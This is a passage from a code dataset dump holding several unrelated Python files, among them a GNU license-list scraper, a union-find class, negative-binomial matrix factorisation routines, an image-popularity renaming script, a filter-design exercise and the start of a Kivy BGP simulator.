None:\n self.viewer = rendering.SimpleImageViewer()\n if mode == \"human\":\n self.viewer.imshow(self.observation)\n\n elif mode == \"rgb_array\":\n render_frame = np.copy(self.worldL)\n render_frame[5:self.window_shape[1]+5, 5:self.window_shape[0]+5] = self.observation\n cv2.rectangle(render_frame, (0,0), (self.window_shape[1]+10, self.window_shape[0]+10),\n (0,0,0), 5)\n return render_frame\n #return self.worldL, self.observation\n\n def close(self):\n pass\n","sub_path":"path_following/envs/laser_2DLine.py","file_name":"laser_2DLine.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"530568164","text":"#!python3\n#encoding:utf-8\nimport dataset\nfrom bs4 import BeautifulSoup\nimport time\nimport os.path\nimport requests\n\nclass GnuSite(object):\n def __init__(self, path_gnu_licenses_sqlite3):\n self.__db_license = dataset.connect('sqlite:///' + path_gnu_licenses_sqlite3)\n\n def GetAll(self):\n for lang in self.__GetAllLanguages():\n self.processing_language_code = lang\n soup = BeautifulSoup(self.__GetHtmlString(lang), 'html.parser')\n for div in soup.select('div.big-section'):\n typeName = self.__GetSection(div)\n print(typeName)\n\n def __GetAllLanguages(self):\n langs = []\n soup = BeautifulSoup(self.__GetHtmlString('en'), 'html.parser')\n for span in soup.find('div', id='translations').find('p').find_all('span'):\n langs.append(span.find('a').get('lang'))\n print(span.find('a').get('lang'))\n return langs\n\n def __GetHtmlString(self, lang):\n url = 'https://www.gnu.org/licenses/license-list.{0}.html'.format(lang)\n path_this_dir = os.path.abspath(os.path.dirname(__file__))\n file_name = os.path.basename(url)\n file_path = os.path.join(path_this_dir, file_name)\n if os.path.isfile(file_path):\n print('ファイル読み込み-----------------------')\n with open(file_path, 'rb') as f:\n html_str = f.read()\n else:\n print('HTTPリクエスト-----------------------')\n time.sleep(2)\n r = requests.get(url)\n html_str = r.content\n with open(file_path, 'wb') as f:\n f.write(html_str)\n return html_str\n\n def __GetSection(self, div):\n h3Id = div.find('h3').get('id')\n print('{0},{1}'.format(h3Id, div.find('h3').string.strip()))\n if 'SoftwareLicenses' == h3Id:\n for sub in div.find_all_next('div', class_='big-subsection'):\n h4Id = sub.find('h4').get('id')\n if 'GPLCompatibleLicenses' == h4Id:\n self.__GetDl(sub, 'software')\n elif 'GPLIncompatibleLicenses' == h4Id:\n self.__GetDl(sub, 'software')\n elif 'NonFreeSoftwareLicenses' == h4Id:\n self.__GetDl(sub, 'software')\n else:\n break\n elif 'DocumentationLicenses' == h3Id:\n for sub in div.find_all_next('div', class_='big-subsection'):\n h4Id = sub.find('h4').get('id')\n if 'FreeDocumentationLicenses' == h4Id:\n self.__GetDl(sub, 'document')\n elif 'NonFreeDocumentationLicenses' == h4Id:\n self.__GetDl(sub, 'document')\n else:\n break\n elif 'OtherLicenses' == h3Id:\n for sub in div.find_all_next('div', class_='big-subsection'):\n h4Id = sub.find('span').find('a').get('href')\n if None is not sub.find('h4').string:\n print('{0},{1}'.format(h4Id, sub.find('h4').string.strip()))\n else:\n print('{0},{1}'.format(h4Id, sub.find('h4').string))\n if '#OtherLicenses' == h4Id:\n print(h4Id + '---------------')\n dl = self.__GetDl(sub, 'other')\n dl = self.__GetDl(dl, 'other')\n dl = self.__GetDl(dl, 'other')\n dl = self.__GetDl(dl, 'other')\n elif '#Fonts' == h4Id:\n print(h4Id + '---------------')\n dl = self.__GetDl(sub, 'other.font')\n dl = self.__GetDl(dl, 
'other.font')\n                elif '#OpinionLicenses' == h4Id:\n                    print(h4Id + '---------------')\n                    self.__GetDl(sub, 'other.opinion')\n                elif '#Designs' == h4Id:\n                    print(h4Id + '---------------')\n                    self.__GetDl(sub, 'other.design')\n\n    def __GetDl(self, div, targetValue):\n        dl = div.find_next('dl')\n        if None is dl:\n            return\n        print(\"number of dt tags = {0}\".format(len(dl.find_all('dt'))))\n        print(\"number of dd tags = {0}\".format(len(dl.find_all('dd'))))\n        for dt in dl.find_all('dt'):\n            for a in dt.find_all('a'):\n                if None is not a.string:\n                    name = a.string.strip().replace('\\n', '')\n                    try:\n                        if 'en' == self.processing_language_code:\n                            self.__db_license['Licenses'].insert(self.__CreateLicense(dl, dt, targetValue))\n                        license = self.__db_license['Licenses'].find_one(HeaderId=self.__GetHeaderId(dt))\n                        if None is self.__db_license['Multilingual'].find_one(LicenseId=license['Id'], LanguageCode=self.processing_language_code):\n                            self.__db_license['Multilingual'].insert(self.__CreateMultilingual(dt, name, self.__db_license['Licenses'].find_one(HeaderId=self.__GetHeaderId(dt))['Id']))\n                    except Exception as e:\n                        print('%r' % e)\n        return dl\n\n    def __CreateLicense(self, dl, dt, targetValue):\n        print(self.__GetHeaderId(dt))\n        record = dict(\n            HeaderId=self.__GetHeaderId(dt),\n            ColorId=self.__db_license['Colors'].find_one(Key=dl.get('class'))['Id'],\n            Target=targetValue,\n            Url=dt.find('a').get('href')\n        )\n        print(record)\n        return record\n\n    def __CreateMultilingual(self, dt, name, license_id):\n        record = dict(\n            LicenseId=license_id,\n            LanguageCode=self.processing_language_code,\n            Name=name,\n            Description=dt.find_next('dd').decode_contents(formatter=\"html\").strip(),\n        )\n        print(record)\n        return record\n\n    def __GetHeaderId(self, dt):\n        headerId = ''\n        if None is dt.find('span'):\n            return None\n        for a in dt.find('span').find_all('a'):\n            headerId += a.string + ','\n        return headerId[:-1]\n\n\nif __name__ == '__main__':\n    gnu = GnuSite(\n        path_gnu_licenses_sqlite3 = './GNU.Licenses.sqlite3'\n    )\n    gnu.GetAll()\n\n","sub_path":"database/src/gnu_license/insert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"83847482","text":"import numpy as np\n\n\nclass WeightedQuickUnion():\n    \"\"\"\n    Dynamic connectivity problem.\n    Builds balanced trees: the smaller tree is attached to the larger one.\n    \"\"\"\n\n    def __init__(self, N):\n        self.N = N  # number of connected components\n        self.id = np.arange(N).tolist()  # records, for each element, the parent node within its component tree\n        self.size = [1] * N  # records the number of elements each component contains\n\n    def is_connected(self, p, q):\n\n        return self.find(p) == self.find(q)\n\n    def find(self, p):\n        \"\"\"\n        Time complexity: O(lg n)\n        \"\"\"\n        while p != self.id[p]:\n            p = self.id[p]\n        return p\n\n    def union(self, p, q):\n        '''\n        Time complexity: O(lg n)\n        '''\n\n        idp = self.find(p)\n        idq = self.find(q)\n\n        if self.size[idp] < self.size[idq]:\n            self.id[idp] = idq\n            self.size[idq] += self.size[idp]\n        else:\n            self.id[idq] = idp\n            self.size[idp] += self.size[idq]\n        self.N -= 1\n\n    def count(self):\n        return self.N\n\n\nif __name__ == '__main__':\n    f = open(\"../data/uf.txt\", \"r\")\n    N = int(f.readline())\n    uf = WeightedQuickUnion(N)\n\n    while True:\n        s = f.readline().strip()\n        if not s:\n            break\n        p, q = s.split(\" \")\n        p, q = int(p), int(q)\n        if not uf.is_connected(p, q):\n            uf.union(p, q)\n            print(uf.is_connected(p, q))\n    f.close()\n\n    print(str(uf.count()) + \" components\")\n    print(\"is 1 and 2 connected ? \" + str(uf.is_connected(1, 2)))\n    print(\"is 2 and 9 connected ? 
\" + str(uf.is_connected(2, 9)))\n","sub_path":"Algorithms/chapter1_basic/weighted_quick_union.py","file_name":"weighted_quick_union.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"483817437","text":"## implement algorithm for NB NMF\n## Reference\n## Negative Binomial Matrix Factorization for Recommender Systems\n## Olivier Gouvert, Thomas Oberlin, Cédric Févotte\n\n\nimport numpy as np\nfrom numpy import log\nfrom scipy.special import psi\n# from scipy.special import softmax\nfrom scipy.special import logsumexp, gamma, psi, gammaln\nimport time\nimport sys\n\nfrom sklearn.decomposition.nmf import _initialize_nmf\nfrom scipy.optimize import minimize\n#from misc import negll_nb, negll_nb_der\n\n## MODEL:\n## X_ij ~ NB(a, lam_ij/(a+lam_ij))\n## lam_ij = sum_k l_ik f_jk\n\n## E X_ij = (LF')_ij\n## Var(X_ij) = (LF')_ij(1 + 1/a * (LF')_ij)\n## so when a --> +inf, distribution close to Poisson(LF')\n\n\n\n# def cost_full(X, Lam, a):\n# \ta = a.reshape(1,-1)\n# ll = gammaln(X + a) - gammaln(a)+ X * log(Lam/(Lam + a)) + a * log(a/(a+ Lam))\n# return -np.sum(ll)\n\ndef cost_full(X, Lam, a):\n\ta = a.reshape(1,-1)\n\tll = gammaln(X + a) - gammaln(a)+ X * log(Lam/(Lam + a)) + a * log(a/(a+ Lam))\n\treturn -np.sum(ll)\n\n## it is the source code for scipy.specia.softmax, but I cannot import it for some reason \ndef softmax(x, axis=None):\n\treturn np.exp(x - logsumexp(x, axis=axis, keepdims=True))\n\n\n### ----------------------------------------\n### update L, F, a in EM iterations\n### a is a list of size p (n_feature)\n### ----------------------------------------\ndef em_full(X, k, a, init, LF = None, maxiter = 100, verbose = True, eval_every = 10, tol = 1e-03, random_state = 123, return_loss = False, fix = [False,False,False]):\n\te = sys.float_info.min\n\t## init\n\tif init is None:\n\t\tL, F= LF\n\telse:\n\t\tL, Ft = _initialize_nmf(X, k, init=init, eps=1e-6, random_state=random_state)\n\t\tF = Ft.T\n\n\tL = np.clip(L, a_min = e, a_max = None)\n\tF = np.clip(F, a_min = e, a_max = None)\n\t## iterate\n\tif verbose:\n\t\tprint(\"\tniter\t\tcost \t\trel_cost\\n\")\n\n\tmycosts = []\n\tfor iter in range(maxiter):\n\t\t# if verbose and iter % eval_every == 0:\n\t\t# \tmycost = cost_full(X,L.dot(F.T),a)\n\t\t# \tprint(\"iter {:4d}\t{:.3f}\t{:.3f}\".format(iter, mycost, a))\n\t\t# \tloss.append(mycost)\n\t\t## assess convergence\n\t\tif iter % eval_every == 0:\n\t\t\tmycost = cost_full(X,L.dot(F.T), a)\n\t\t\tmycosts.append(mycost)\n\t\t\trel_cost = (mycosts[-2] - mycost)/abs(mycosts[-2]) if iter > 0 else 10000\n\t\t\tif verbose:\n\t\t\t\tprint(\"iter {:4d}\\t{:.3f}\\t{:.6f}\t\".format(iter, mycost, rel_cost))\n\t\t\tif rel_cost < tol:\n\t\t\t\tprint(\"rel_cost {} meet tolerance {} after {} iteration\".format(rel_cost, tol, iter))\n\t\t\t\tbreak\n\n\t\tL,F, a = _update_em_full(X,L,F, a, fix)\n\n\tif return_loss:\n\t\treturn L,F, a, mycosts\n\n\treturn L,F, a\n\ndef _update_em_full(X,L,F,a, fix):\n\tfix_l, fix_f, fix_a = fix\n\n\te = sys.float_info.min \n\t## update a\n\tif not fix_a:\n\t\tLFt = L @ F.T\n\t\tstart = time.time()\n\t\t# res = minimize(_obj_a, 1, method='nelder-mead',args = (X,LFt, a),\n\t # options={'xtol': 1e-5, 'disp': False, 'maxiter':10})\n\n\t\tI,J = X.shape\n\t\tC1 = np.sum(psi(X + a.reshape(1,-1)) - log(LFt + a.reshape(1,-1)), axis = 0)\n\t\tC2 = np.sum((X+a.reshape(1,-1))/(LFt + a.reshape(1,-1)), axis = 0)\n\t\tparams = [I,J,C1,C2]\n\n\t\tres = minimize(_obj_a, a, 
method='nelder-mead',args = (params),\n\t\t               options={'xtol': 1e-5, 'disp': False, 'maxiter':50})\n\t\t# res = minimize(_obj_a, 1, method='Newton-CG', jac=_obj_a_der,args = (params),\n\t\t# \t\t\t   options={'xtol': 1e-5, 'disp': False, 'maxiter':10})\n\t\truntime = time.time() - start\n\t\ta = res.x\n\t## update L\n\tif not fix_l:\n\t\tLFt = L @ F.T  # recompute: LFt is otherwise undefined here when fix_a is True\n\t\tM1 = (X/LFt) @ F\n\t\tM2 = ((X + a.reshape(1,-1))/(LFt + a.reshape(1,-1))) @ F\n\t\tL = L * (M1/M2)\n\t\tL = np.clip(L, a_min = e, a_max = None)\n\t## update F\n\tif not fix_f:\n\t\tLFt = L @ F.T\n\t\tN1 = (X / LFt).T @ L\n\t\tN2 = ((X + a.reshape(1,-1))/(LFt + a.reshape(1,-1))).T @ L \n\t\tF = F * (N1/N2)\n\t\tF = np.clip(F, a_min = e, a_max = None) \n\treturn L,F, a\n\n## C1 = np.sum(psi(X + a0) - log(Lam + a0))\n## C2 = np.sum((X+a0)/(Lam + a0))\n\n## scipy.optimize re-evaluates the objective at every call, so without precomputing params the same quantities would be computed many times!\ndef _obj_a(a, params):\n\tI,J,C1,C2 = params\n\n\t#I, J = X.shape \n\t# Xa_d_Lama = (X + a)/(Lam + a)\n\t# obj = I*J*(a*log(a) - gamma(a)) + np.sum((a-1)*(psi(X + a) - log(Lam + a)) - a * Xa_d_Lama + Xa_d_Lama * Lam)\n\t# obj = I*J*(a*log(a) - gammaln(a)) + np.sum((a-1)*(psi(X + a0) - log(Lam + a0)) - a*(X+a0)/(Lam + a0))\n\t#obj = (I*(a*log(a) - gammaln(a)) + ((a-1)*C1 - a*C2).sum()).sum()\n\n\tobj = I * (a*log(a) - gammaln(a)).sum()\n\tobj += ((a-1)*C1 - a*C2).sum()\n\treturn -obj\n\ndef _obj_a_der(a, params):\n\t# I, J = X.shape \n\t# der = I*J*(log(a) + 1 - psi(a)) + np.sum(psi(X + a0) - log(Lam + a0) - (X+a0)/(Lam + a0))\n\tI,J,C1,C2 = params\n\tder = I*(log(a) + 1 - psi(a)).sum() + C1.sum() - C2.sum()\n\treturn -der\n\n\n\n### --------------------------------------------------\n### gibbs algorithm\n### TO DO\n### --------------------------------------------------\n\ndef gibbs(X, L,F, a ,maxiter = 100, verbose = True, eval_every = 10):\n\treturn None\n\n### --------------------------------------------------\n##### Variational Bayes algorithm\n\n### l_ik ~ Gamma(al, bl)\n### f_jk ~ Gamma(af, bf)\n\n#### Composite model:\n### U_ij ~ Gamma(a,a)\n### Z_ijk ~ Pois(U_ij l_ik f_jk)\n### X_ij = sum_k Z_ijk\n\n#### optimize using CAVI\n### q(Z_ijK) = MN(X_ij, Zeta_ijK)\n### q(U_ij) = Gamma(au_ij, bu_ij)\n### q(l_ik) = Gamma(al_ik, bl_ik)\n### q(f_jk) = Gamma(af_jk, bf_jk)\n\n#### update\n### Zeta_ijk \\propto exp(<log l_ik> + <log f_jk>)\n### au_ij = a + X_ij; bu_ij = a + sum_k <l_ik><f_jk>\n### al_ik = al + sum_j X_ij Zeta_ijk; bl_ik = bl + sum_j <U_ij><f_jk>\n### af_jk = af + sum_i X_ij Zeta_ijk; bf_jk = bf + sum_i <U_ij><l_ik>\n\n#### expectations w.r.t. q\n### for x ~ Gamma(a,b)\n### <x> = a/b; <log x> = psi(a) - log(b)\n### --------------------------------------------------\n\ndef VB(X,k, a ,prior, maxiter = 100, verbose = True, eval_every = 10):\t\n\tal,bl,af,bf = prior\n\n\tn,p = X.shape\n\n\t## initialize variational parameters\n\tAl = np.exp(np.random.uniform(size = (n,k)))\n\tBl = np.exp(np.random.uniform(size = (n,k)))\n\tAf = np.exp(np.random.uniform(size = (p,k)))\n\tBf = np.exp(np.random.uniform(size = (p,k)))\n\tAu = np.exp(np.random.uniform(size = (n,p)))\n\tBu = np.exp(np.random.uniform(size = (n,p)))\n\tZeta = np.random.uniform(size = (n,p,k))\n\tZeta = softmax(Zeta, axis = 2)\n\n\tif verbose:\n\t\tprint(\"\tniter\t\tcost\\n\")\n\n\tfor iter in range(maxiter):\n\n\t\tif verbose and iter % eval_every == 0:\n\t\t\tL = E_gamma(Al, Bl)\n\t\t\tF = E_gamma(Af, Bf)\n\t\t\tmycost = cost_full(X,L.dot(F.T),a)\n\t\t\tprint(\"iter {:4d}\t{:.3f}\".format(iter, mycost))\n\n\t\t## update Zeta\n\t\t## takes O(IJK); main operation is a softmax over IJ vectors of 
length K; how is psi function evaluated?\n\t\tE_logL = E_log_gamma(Al, Bl)\n\t\tE_logF = E_log_gamma(Af, Bf)\n\t\tZeta = np.expand_dims(E_logL, axis = 1) + np.expand_dims(E_logF, axis = 0)\n\t\tZeta = softmax(Zeta, axis = 2)\n\n\t\t## update Au, Bu\n\t\t## takes O(IJK)\n\t\tE_L = E_gamma(Al,Bl)\n\t\tE_F = E_gamma(Af,Bf)\n\t\tAu = a + X ## THIS IS FIXED\n\t\tBu = a + np.einsum('ik,jk -> ij', E_L, E_F)\n\n\t\t## update Al, Bl\n\t\t## takes O(IJK)\n\t\tE_U = E_gamma(Au,Bu)\n\t\t#E_F = E_gamma(Af, Bf)\n\t\tAl = al + np.einsum('ij,ijk -> ik', X, Zeta)\n\t\tBl = bl + np.einsum('ij,jk -> ik', E_U, E_F)\n\n\t\t## update Af, Bf\n\t\t## takes O(IJK)\n\t\tE_L = E_gamma(Al,Bl)\n\t\tAf = af + np.einsum('ij,ijk -> jk', X, Zeta)\n\t\tBf = bf + np.einsum('ij,ik -> jk', E_U, E_L)\n\n\tL = E_gamma(Al, Bl)\n\tF = E_gamma(Af, Bf)\n\n\treturn L,F\n\ndef E_log_gamma(A, B):\n\treturn psi(A) - np.log(B)\n\ndef E_gamma(A,B):\n\treturn A/B\n\n## runtime result for VB\n# n = 500\n# p = 1000\n# K = 3\n# Zeta : 0.055\n# ABl : 0.011\n# ABf : 0.008\n# ABu : 0.004\n# VB fitted with 15.72 seconds\n\n\n### ----------------------------------------\n### testing \n### ----------------------------------------\n\ndef VB_test(X,k, a ,prior, maxiter = 100, verbose = True, eval_every = 10):\t\n\tal,bl,af,bf = prior\n\n\tn,p = X.shape\n\n\t## initialize variational parameters\n\tAl = np.exp(np.random.uniform(size = (n,k)))\n\tBl = np.exp(np.random.uniform(size = (n,k)))\n\tAf = np.exp(np.random.uniform(size = (p,k)))\n\tBf = np.exp(np.random.uniform(size = (p,k)))\n\tAu = np.exp(np.random.uniform(size = (n,p)))\n\tBu = np.exp(np.random.uniform(size = (n,p)))\n\tZeta = np.random.uniform(size = (n,p,k))\n\tZeta = softmax(Zeta, axis = 2)\n\n\ttime_ABl = []\n\ttime_ABf = []\n\ttime_ABu = []\n\ttime_Zeta = []\n\n\tif verbose:\n\t\tprint(\"\tniter\t\tcost\\n\")\n\n\tfor iter in range(maxiter):\n\n\t\tif verbose and iter % eval_every == 0:\n\t\t\tL = E_gamma(Al, Bl)\n\t\t\tF = E_gamma(Af, Bf)\n\t\t\tmycost = cost_full(X,L.dot(F.T),a)\n\t\t\tprint(\"iter {:4d}\t{:.3f}\".format(iter, mycost))\n\n\t\t## update Zeta\n\t\tstart = time.time()\n\t\tE_logL = E_log_gamma(Al, Bl)\n\t\tE_logF = E_log_gamma(Af, Bf)\n\t\tZeta = np.expand_dims(E_logL, axis = 1) + np.expand_dims(E_logF, axis = 0)\n\t\tZeta = softmax(Zeta, axis = 2)\n\t\ttime_Zeta.append(time.time() - start)\n\n\t\t## update Au, Bu\n\t\tstart = time.time()\n\t\tE_L = E_gamma(Al,Bl)\n\t\tE_F = E_gamma(Af,Bf)\n\t\tAu = a + X ## THIS IS FIXED\n\t\tBu = a + np.einsum('ik,jk -> ij', E_L, E_F)\n\t\ttime_ABu.append(time.time() - start)\n\n\t\t## update Al, Bl\n\t\tstart = time.time()\n\t\tE_U = E_gamma(Au,Bu)\n\t\t#E_F = E_gamma(Af, Bf)\n\t\tAl = al + np.einsum('ij,ijk -> ik', X, Zeta)\n\t\tBl = bl + np.einsum('ij,jk -> ik', E_U, E_F)\n\t\ttime_ABl.append(time.time() - start)\n\n\t\t## update Af, Bf\n\t\tstart = time.time()\n\t\tE_L = E_gamma(Al,Bl)\n\t\tAf = af + np.einsum('ij,ijk -> jk', X, Zeta)\n\t\tBf = bf + np.einsum('ij,ik -> jk', E_U, E_L)\n\t\ttime_ABf.append(time.time() - start)\n\n\tprint(\"time : \\n\")\n\tprint(\"Zeta : {:.3f}\".format(np.mean(time_Zeta)))\n\tprint(\"ABl : {:.3f}\".format(np.mean(time_ABl)))\n\tprint(\"ABf : {:.3f}\".format(np.mean(time_ABf)))\n\tprint(\"ABu : {:.3f}\".format(np.mean(time_ABu)))\n\n\tL = E_gamma(Al, Bl)\n\tF = E_gamma(Af, Bf)\n\n\treturn 
L,F\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/NB_NMF2.py","file_name":"NB_NMF2.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"54826429","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass CoastProductPipeline(object):\n def process_item(self, item, spider):\n\n if item['skus']:\n item['skus'] = [i.strip() for i in item['skus'][0].split(\",\")]\n else:\n item['skus'] = None\n\n if item['fabric']:\n item['fabric'] = item['fabric'][0].replace(\"Fabric:\",\"\")\n else:\n item['fabric'] = 'N/A'\n\n for i in item.keys():\n if isinstance(item[i], list) and len(item[i]) <=1:\n item[i] = item[i][0]\n\n return item\n","sub_path":"coastdemo/coastdemo/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"357639897","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport torch\nimport torchvision.models\nimport torchvision.transforms as transforms\nimport glob\nimport os\nfrom PIL import Image\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef prepare_image(image):\n if image.mode != 'RGB':\n image = image.convert(\"RGB\")\n Transform = transforms.Compose([\n transforms.Resize([224,224]), \n transforms.ToTensor(),\n ])\n image = Transform(image) \n image = image.unsqueeze(0)\n return image.to(device)\n\ndef predict(image, model):\n image = prepare_image(image)\n with torch.no_grad():\n preds = model(image)\n # print(r'Popularity score: %.2f' % preds.item() * 100)\n return '%.0f' % (preds.item() * 100)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--image_path', type=str, default='images/')\n config = parser.parse_args()\n image_paths = sorted(glob.glob(os.path.join(config.image_path, '*')))\n model = torchvision.models.resnet50()\n # model.avgpool = nn.AdaptiveAvgPool2d(1) # for any size of the input\n model.fc = torch.nn.Linear(in_features=2048, out_features=1)\n model.load_state_dict(torch.load('/content/Intrinsic-Image-Popularity/model/model-resnet50.pth', map_location=device)) \n model.eval().to(device)\n\n if not os.path.isdir(config.image_path):\n print(\"ERROR: '\" + config.image_path + \"' is not a directory!\")\n return\n\n count = 0\n max_count = 0\n\n image_names = []\n\n for image_path in image_paths:\n file_name, file_extension = os.path.splitext(os.path.split(image_path)[1])\n if (file_extension in ['.png'] and '_' not in file_name):\n max_count += 1\n image_names.append(file_name + file_extension)\n \n if len(image_names) == 0:\n print(\"ERROR: '\" + config.image_path + \"' does not contain any images to rename!\")\n return\n \n print(\"Start renaming of \" + str(len(image_names)) + \" image(s)...\")\n\n for image_name in image_names:\n count += 1\n\n full_path = os.path.join(config.image_path, image_name)\n\n image = Image.open(full_path)\n score = predict(image, model)\n\n os.rename(full_path, os.path.join(config.image_path, str(score) + '_' + image_name))\n \n print(str(count) + '/' + str(max_count))\n\nif __name__ == '__main__':\n main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} 
+{"seq_id":"537634576","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nMiguel Mares\r\nEce 450 \r\nExam IV\r\nPart A\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom scipy import signal as sig\r\nfrom math import pi, exp, cos, sin, log, sqrt\r\nfrom control import margin\r\nfrom control import tf\r\nfrom cmath import exp\r\nimport numpy as np \r\nfrom math import log10\r\n\r\n########### Calculating n ##########################\r\nwp = .5\r\nHp2 = .707\r\n\r\nn = log10( 1/Hp2 - 1)/(2*log10(wp) )\r\nprint('np = ',n)\r\n\r\n\r\n\r\nws = 2\r\nHs2 = .0178\r\n\r\nns = log10( 1/Hs2 - 1)/(2*log10(ws) )\r\nprint('ns = ',ns)\r\n\r\n####################Plotting Butterworth Filter#########################\r\n\r\nnum = [1]\r\nd1 = [1,1]\r\nd2 = [1,1,1]\r\nden = np.convolve(d1,d2)\r\n\r\nsystem = sig.lti(num,den)\r\nw, Hmag, Hphase = sig.bode(system)\r\n\r\nAmpl = 10**(0.05*Hmag)\r\n#plt.subplot(211)\r\nplt.semilogx(w,Ampl,'k') # Plot amplitude, not dB.\r\nplt.title('3rd Oder Butterworth')\r\nplt.yticks([0,.707,.0178,1])\r\nplt.grid(which='both')\r\nplt.xlabel('$\\omega$ (rad/s)')\r\nplt.ylabel('|H|')\r\nplt.xticks([.5,1,2])\r\nplt.show()\r\n\r\n#plt.subplot(212)\r\nplt.semilogx(w,Hphase,'k') # Plot amplitude, not dB.\r\n#plt.title('Angle Bode')\r\nplt.grid(which='both')\r\nplt.xlabel('$\\omega$ (rad/s)')\r\nplt.ylabel('/_ |H|')\r\nplt.yticks([0,-90,-180,-270])\r\n#plt.xticks([100000,200000,50000])\r\nplt.show()\r\n\r\nnum = [1e15]\r\nden = [1,2*1e5,2*1e10,1e15]\r\n\r\nsystem = sig.lti(num,den)\r\nw, Hmag, Hphase = sig.bode(system)\r\n\r\nAmpl = 10**(0.05*Hmag)\r\nplt.semilogx(w,Ampl,'k') # Plot amplitude, not dB.\r\nplt.title('Scaled 3rd Order Butterworth')\r\nplt.yticks([0,.707,.0178, 1])\r\nplt.grid(which='both')\r\nplt.xlabel('$\\omega$ (rad/s)')\r\nplt.ylabel('|H|')\r\nplt.xticks([100000,200000,50000])\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n##############Calculating and Plotting Z Bode############################\r\n\r\nNN = 5000\r\nphi = np.linspace(0,2*pi,NN)\r\nz = np.zeros(NN, dtype = np.complex)\r\nH = np.zeros(NN, dtype = np.complex)\r\n\r\nT=.2\r\nA = np.deg2rad(sqrt(.75)*T)\r\nb = 1 \r\nH1 = ((b/(b-exp(-T))) + (((.577)*exp(-.5*T)*sin(A)*b) - (b**2) + (exp(-.5*T)*cos(A)*b)) / ((b**2) - (2*exp(-.5*T)*cos(A)*b) + exp(-T)))\r\nprint(\"H1 = \",H1)\r\nfor n in range(0,NN):\r\n z = exp(1j*phi[n])\r\n H[n] = ((z/(z-exp(-T))) + (((.577)*exp(-.5*T)*sin(A)*z) - (z**2) + (exp(-.5*T)*cos(A)*z)) / ((z**2) - (2*exp(-.5*T)*cos(A)*z) + exp(-T)))/H1\r\n \r\n\r\nphi1 = np.rad2deg(wp*T)\r\nphi2 = np.rad2deg(ws*T)\r\nprint('phi_pass = ',phi1,'\\n','phi_stop = ',phi2)\r\n \r\nplt.subplot(211)\r\n#plt.plot((180/pi)*phi,abs(H),'k')\r\nplt.semilogx((180/pi)*phi,20*np.log10(H),'k')\r\nplt.axis([1,100, -60, 10])\r\nplt.ylabel('|G| dB')\r\nplt.yticks([ -35,-3,0])\r\nplt.axvline(phi1,color='k')\r\nplt.axvline(phi2,color='k')\r\nplt.text(2,-10,'$\\phi1$ = {}'.format(round(phi1,2)),fontsize=12)\r\nplt.text(8,-30,'$\\phi2$ = {}'.format(round(phi2,2)),fontsize=12)\r\nplt.title('zbode')\r\nplt.grid(which='both')\r\n\r\naaa = np.angle(H)\r\n#for n in range(NN):\r\n# if aaa[n] > 0:\r\n# aaa[n] = aaa[n] - 2*pi\r\n\r\nplt.subplot(212)\r\n#plt.plot((180/pi)*phi,(180/pi)*aaa,'k')\r\nplt.semilogx((180/pi)*phi,(180/pi)*aaa,'k')\r\nplt.ylabel('/G (degrees)')\r\nplt.axis([1,100, -180,0])\r\nplt.yticks([-90,-45,-180,0])\r\nplt.axvline(5.7,color='k')\r\nplt.axvline(phi2,color='k')\r\nplt.text(2,-90,'$\\phi1$ = {}'.format(round(phi1,2)),fontsize=12)\r\nplt.text(30,-140,'$\\phi2$ = 
{}'.format(round(phi2,2)),fontsize=12)\r\nplt.grid(which='both')\r\nplt.xlabel('$\\phi$ (degrees)')\r\nplt.savefig('H_zbode.png',dpi=300)\r\nplt.show()\r\n\r\n\r\n","sub_path":"450exam4parta.py","file_name":"450exam4parta.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"27295085","text":"from kivy.app import App\nfrom kivy.graphics import Rectangle \nfrom kivy.graphics import Color\nfrom kivy.graphics import Line \nfrom kivy.lang import Builder\nfrom kivy.properties import ListProperty, StringProperty, ObjectProperty, NumericProperty, DictProperty\nfrom kivy.uix.button import Button \nfrom kivy.uix.label import Label \nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.widget import Widget\nfrom simulator import BGPSimulator, Node\n\nimport math\n\n#Define our different screens\nclass WelcomeScreen(Screen):\n pass\n\n# fixed node is just a node that doesn't move - used for simulator screen\nclass FixedNode(Widget):\n node_name = StringProperty()\n plinks = ListProperty()\n pclinks = ListProperty()\n\nclass NodeG(Widget):\n node_name = StringProperty()\n #links = ListProperty()\n plinks = ListProperty()\n pclinks = ListProperty()\n\n # if mouse touch down is on me, claim the touch - so it won't affect any other nodes that the touch down might also be touching\n def on_touch_down(self, touch):\n if self.collide_point(*touch.pos):\n touch.grab(self)\n return True\n\n # if touch_move, check if you own the touch, if you do, move the node with the touch_move\n def on_touch_move(self, touch):\n if self.collide_point(*touch.pos):\n if touch.grab_current is self:\n self.center = touch.pos\n for link in self.plinks:\n link.points[0] = link.nodes[0].center_x\n link.points[1] = link.nodes[0].center_y\n link.points[2] = 